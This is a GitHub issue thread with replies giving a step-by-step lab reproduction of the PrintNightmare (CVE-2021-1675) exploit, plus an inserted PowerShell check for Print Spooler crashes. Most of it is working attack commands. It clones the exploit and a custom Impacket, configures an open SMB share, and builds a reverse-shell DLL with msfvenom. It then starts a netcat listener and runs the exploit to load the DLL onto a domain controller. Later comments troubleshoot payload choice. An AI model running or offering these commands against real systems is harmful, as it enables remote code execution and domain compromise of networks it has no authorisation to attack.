How to Reproduce (Virtual Environment):
BlackSnufkin opened this issue · 13 comments
This is how I was able to reproduce the exploit in a virtual environment:

- The best practice is to create a Python virtual environment:

```bash
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
```

- Clone the repo and install the custom Impacket version:

```bash
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
```

- Set up the SMB share. Copy the original smb.conf file and create a backup file:

```bash
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
```

- Now change smb.conf to this new configuration file:

```ini
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
```

- Spin up the SMB share:

```bash
impacket-smbserver smb /tmp/
```

In case you have some problems with the SMB, try to use the built-in smbd service:

```bash
service smbd start
```

- Payload creation: create a reverse shell payload as a DLL:

```bash
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
```

- Windows environment:
  - You need to create a DC with Active Directory.
  - Create a low-privilege user.
  - Create a Windows 10 client and join it to the domain.
  - Log in to the Win10 with the new user.
- Set up a listener:

```bash
nc -lnvp 9001
```

- Run the exploit:

```bash
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
```

- ENJOY your SHELL =)

Machines:
- Attacker: Kali Linux
- DC: Server 2016
- Client: Win10
Shall I reboot all machines?

Sometimes the spooler service gets crashed. Make sure that the service is running; you can use rpcdump to verify.
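An added example, not from this thread and not part of the cube0x0 project, of how an administrator would confirm the Spooler state from the DC side (the Windows-side counterpart of the rpcdump check above). It uses standard PowerShell cmdlets and the Service Control Manager's unexpected-termination event IDs in the System log; it is meant to be run in an elevated session on the DC itself, and the recovery step is a lab choice, not a recommendation for production controllers.

```powershell
# Added example, not part of this thread: check the Print Spooler on the DC
# after a suspected crash. Run in an elevated PowerShell session on the DC.

# Current state of the Spooler service (Running / Stopped) and its start type.
$svc = Get-Service -Name Spooler
Write-Host "Spooler on $env:COMPUTERNAME is $($svc.Status) (StartType: $($svc.StartType))"

# The Service Control Manager records unexpected service terminations in the
# System log: 7031 = terminated unexpectedly, recovery action scheduled;
# 7034 = terminated unexpectedly, no recovery action configured.
$crashes = Get-WinEvent -FilterHashtable @{
    LogName      = 'System'
    ProviderName = 'Service Control Manager'
    Id           = 7031, 7034
} -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like '*Print Spooler*' }

if ($crashes) {
    Write-Host "Recent Spooler crash events on ${env:COMPUTERNAME}:"
    $crashes | Select-Object TimeCreated, Id, Message | Format-Table -AutoSize -Wrap
} else {
    Write-Host "No recent Spooler crash events found on $env:COMPUTERNAME"
}

# Lab recovery: bring the service back so the reproduction can continue.
# On production DCs that do not need to print, the mitigation is the opposite:
# stop the service and set its start type to Disabled.
if ($svc.Status -ne 'Running') {
    Start-Service -Name Spooler
    Write-Host "Spooler started; status is now $((Get-Service -Name Spooler).Status)"
}
```

A repeated 7031/7034 pair for Print Spooler in the same window as the exploit attempts is the signal the thread is describing: the service fell over rather than the exploit silently failing, which is why the reply says to verify with rpcdump before rebooting.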
DC and client both need to be checked?

Interesting. Try to check manually on the DC; if you're still having problems, just reboot.

I use Server 2012 as the DC, will it cause problems?

Basically no, but if I remember right I saw someone on Twitter claiming he had problems with that version.

OK, I will use your config. Thank you very much, hope I can fix that before dinner. I have worked on it for 2 days... (;´༎ຶД༎ຶ`)

😄 It's all good, it took me 4 days until I was able to reproduce. Just try harder 😉

Server 2012 R2 (DC) will fail with a normal user.
I think this issue is because of the hard-coded shebang (e.g. `#!/usr/bin/python3`). Changing it to `#!/usr/bin/env python3` solved the issue for me.

Thank you. My attempt using the payload windows/shell_reverse_tcp fails; using the payload you suggest, windows/x64/shell_reverse_tcp, is successful.